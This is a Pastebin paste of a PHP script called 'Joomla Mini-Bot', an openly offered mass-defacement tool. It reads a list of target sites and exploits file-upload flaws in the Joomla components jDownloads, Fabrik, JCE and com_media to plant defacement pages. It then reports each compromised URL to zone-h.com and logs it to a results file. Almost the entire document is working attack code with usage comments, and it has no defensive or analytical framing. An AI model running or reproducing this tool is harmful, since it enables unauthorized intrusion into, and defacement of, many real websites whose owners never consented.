Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Joomla Mini-Bot coded by Mr.MaGnoM
- GreeTz : CrashBandicot -- Yunus Incredibl and All my friends -- CodersLeet members
- for more tools : http://magsec.blogspot.com/ -- http://pastebin.com/u/magnom
- Dont change the right of code ;)
- http://magsec.blogspot.com/2014/10/joomla-mini-bot.html
- */
- set_time_limit(0);
- error_reporting(0);
- print("
- __ __ __ __ _____ __ __
- | \/ | | \/ | / ____| | \/ |
- | \ / |_ __| \ / | __ _| | __ _ __ ___ | \ / |
- | |\/| | '__| |\/| |/ _` | | |_ | '_ \ / _ \| |\/| |
- | | | | |_ | | | | |_| | |__| | | | | (_) | | | |
- |_| |_|_(_)|_| |_|\__,_|\_____|_| |_|\___/|_| |_|
- Joomla Mini_Bot Greets to all my friends
- ");
- if(!$argv[1]){
- die("usage $argv[0] list.txt ");
- }
- $getlist=@file_get_contents($argv[1]);
- $ex=explode("\r\n",$getlist);
- echo "\n\t Total sites : ".count($ex)."\n";
- /* $aar=array(
- "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form",
- "/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1",
- "/index.php?option=com_jdownloads&Itemid=0&view=upload",
- "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=",
- );*/
- //foreach($aar as $com){
- foreach($ex as $maw){
- $open=fopen("result.html","a");
- global $open;
- echo "\n[+]Scanning : $maw";
- jce($maw);
- jd($maw);
- fabrik($maw);
- media($maw);
- /*
- $urlxx=($maw).($com);
- $geat=@file_get_contents($urlxx);
- if(eregi('{"result":null,"error":"No function call specified!"}',$geat)){
- echo "\n[-]Found : com_jce";
- jce($maw);
- }else{echo "\n[-]com_jce not found";}
- if(eregi("com_jdownloads",$geat)){
- echo "\n[-]Found : com_jdowloads";
- jd($maw);
- }else{echo "\n[-]com_jdowloads not found";}
- if(eregi("com_fabrik",$geat)){
- echo "\n[-]Found : com_fabrik";
- fabrik($maw);
- }else{echo "\n[-]com_fabrik not found";}
- if(eregi("return-url",$geat)){
- echo "\n[-]Found : com_media";
- media($maw);
- }{echo "\n[-]com_media not found\n";}
- }*/
- }
- function jd($url){ // for jdownloads exploit
- global $open;
- $file1='h.zip';
- $file2='h.gif';
- $bbb='/index.php?option=com_jdownloads&Itemid=0&view=upload';
- $sco=($url).($bbb);
- $post=array(
- 'name'=>'ur name','mail'=>'hackedby@gmail.com','catlist'=>'1','file_upload'=>"@$file1",'filetitle' =>"lolz",
- 'description'=>"<p>zot</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
- 'send'=>1,'senden'=>"Send file", 'description'=>"<p>qsdqsdqsdqsdqsdqsdqsd</p>",
- 'option'=>"com_jdownloads",'view'=>"upload",'pic_upload'=>"@$file2"
- );
- $ch = curl_init ($sco);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
- curl_setopt ($ch, CURLOPT_POST, TRUE);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch);
- curl_close ($ch);
- $path='/images/jdownloads/screenshots/';
- $final=($url).($path).($file2);
- if(eregi('The file was successfully transferred to the server!',$data)or preg_match("/color=\"green\">/",$data)){
- echo "\n[-]Defaced $final";
- $ch = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=xXx009T&domain1=$final&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
- echo "\n[-]Zone-h --> Ok ";
- fwrite($open,"$final <br>[-]exploit : jdowloads<br>[-]zone-h : ok<br><br>");
- }else{
- echo "\n[-]Zone-h --> No";
- fwrite($open,"$final <br>[-]exploit : jdowloads<br>[-]zone-h : no<br><br>"); }
- curl_close ($ch);
- }else{
- echo "\n[-]Com_jdowloads : not infected ";
- }
- }
- function fabrik($url2){ // com_fabrik exploit
- global $open;
- $post = array(
- "userfile" => "@h.txt", // this file is ur index .html or .txt
- "name" => "me.php",
- "drop_data" => "1",
- "overwrite" => "1",
- "field_delimiter" => ",",
- "text_delimiter" => """,
- "option" => "com_fabrik",
- "controller" => "import",
- "view" => "import",
- "task" => "doimport",
- "Itemid" => "0",
- "tableid" => "0",
- );
- $ch = curl_init ("$url2/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch);
- curl_close ($ch);
- $ud=($url2).("/media/h.txt"); // d.txt : rename it to name of ur index example if ur index named lol.html write it like that : /media/lol.html :D
- $get22=@file_get_contents($ud);
- if(eregi("Hacked by xXx009T",$get22)){ // Hacked by Mr.MaGnoM : here put some words exist on ur index for cheek file was uploaded or no just 2 words or 3 or 1 example if u put ur name on index put it here
- echo "\n[-]Defaced : $ud\n";
- $ch3 = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch3, CURLOPT_POST, 1);
- curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=xXx009T&domain1=$ud&hackmode=1&reason=1"); // here put ur name on zone-h
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
- echo "[-]Zone-h : Ok ";
- fwrite($open,"$ud <br>[-]exploit : fabrik<br>[-]zone-h : ok<br><br>");
- }else{
- echo "[-]Zone-h : No";
- fwrite($open,"$ud <br>[-]exploit : fabrik<br>[-]zone-h : no<br><br>");
- }
- curl_close ($ch3);
- }else{
- echo "\n[-]Com_fabrik : not infected ";
- }
- }
- function jce($site){ //jce exploit
- global $open;
- $filejce = "h.gif"; // here ur image ;)
- $post = array
- (
- "upload-dir" => "./../../",
- "Filedata" => "@$filejce",
- "upload-overwrite" => "0",
- "action" => "upload"
- );
- $ch = curl_init ("$site/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_HTTPHEADER, array(
- 'Content-Type: multipart/form-data',
- 'Accept-Language: en-US,en;q=0.5',
- 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7',
- 'Connection: Close',
- 'Proxy-Connection: close',
- 'Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(non\u200be)'
- ));
- $data = curl_exec ($ch);
- curl_close ($ch);
- if(eregi('{"result":{"error":false,"result":"","text":"h.gif"},"error":null}',$data)){ // name of ur image gif this for cheek file uploaded or no
- //$jce1="/images/stories/$filejce";
- $aa=($site).($filejce);
- echo "\n[-]Defaced : $aa";
- $ch3 = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch3, CURLOPT_POST, 1);
- curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=xXx009T&domain1=$aa&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
- echo "\n[-]Zone-h --> Ok ";
- fwrite($open,"$aa <br>[-]exploit : jce<br>[-]zone-h : ok<br><br>");
- }else{
- echo "\n[-]Zone-h --> No";
- fwrite($open,"$aa <br>[-]exploit : jce<br>[-]zone-h : no<br><br>"); }
- curl_close ($ch3);
- }else{
- echo "\n[-]Com_jce : not infected";
- }
- }
- function media($url3){ // com_media exploiter
- global $open;
- $index="h.txt"; // ur file txt
- $value = "aW5kZXgucGhwP29wdGlvbj1jb21fbWVkaWEmdmlldz1pbWFnZXMmdG1wbD1jb21wb25lbnQmZmllbGRpZD0mZV9uYW1lPWpmb3JtX2FydGljbGV0ZXh0JmFzc2V0PWNvbV9jb250ZW50JmF1dGhvcj0=";
- $post = array ("Filedata" => "@".$index, "return-url" => $value);
- $ch = curl_init ("$url3/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt ($ch, CURLOPT_POST, 1);
- @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- $data = curl_exec ($ch);
- curl_close ($ch);
- $fix="/images/$index";
- $urls=($url3).($fix);
- if (eregi("Hacked by xXx009T",$urls)){ // here put 2 words for cheek file uploaded like com_fabrik
- echo "\n[-]Defaced : $urls";
- $ch3 = curl_init ("http://www.zone-h.com/notify/single");
- curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch3, CURLOPT_POST, 1);
- curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=xXx009T&domain1=$urls&hackmode=1&reason=1");
- if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
- echo "\n[-]Zone-h --> Ok ";
- fwrite($open,"$urls <br>[-]exploit : com_media<br>[-]zone-h : ok<br><br>");
- }else{
- echo "\n[-]Zone-h --> No";
- fwrite($open,"$urls <br>[-]exploit : com_media<br>[-]zone-h : no<br><br>"); }
- curl_close ($ch3);
- }else{
- echo "\n[-]Com_media : not infected \n";
- }
- }
- fclose($open);
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement